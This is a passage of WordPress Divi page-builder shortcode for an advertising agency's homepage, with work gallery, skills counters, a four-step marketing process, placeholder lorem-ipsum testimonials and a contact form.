button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"|auto|2px|auto||\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-w.jpg\" title_text=\"800x800 w\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x400.jpg\" title_text=\"800x400\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"4.5.2\" custom_margin=\"||||false|false\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800..1.jpg\" title_text=\"800x800..1\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800.jpg\" title_text=\"800x800\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"0px||50px||false|false\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"4.4.9\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.1\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>We have a dedicated team to build new tools and technique, to complete the day today repetitive work with precision.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Lead/Sales Generation Campaign - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Digital Advertising - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"4.5.2\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Artboard-4.png\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-12.png\" alt=\"Advertising agency in delhi\" title_text=\"Advertising agency in delhi\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"4.5.2\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]<p>NOBODY READS ADS, PEOPLE READ WHAT INTERESTS THEM &amp; SOMETIME IT\'S AN AD</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px||3px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just four steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-5.jpg\" alt=\"marketing strategy\" title_text=\"marketing strategy\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"50px||50px|||\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]<p>Best Advertising Is Done By Satisfied Customers. We Believe &amp; Nurture It In Our Business.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.4.9\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" fullwidth_field=\"on\" _builder_version=\"4.4.9\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" 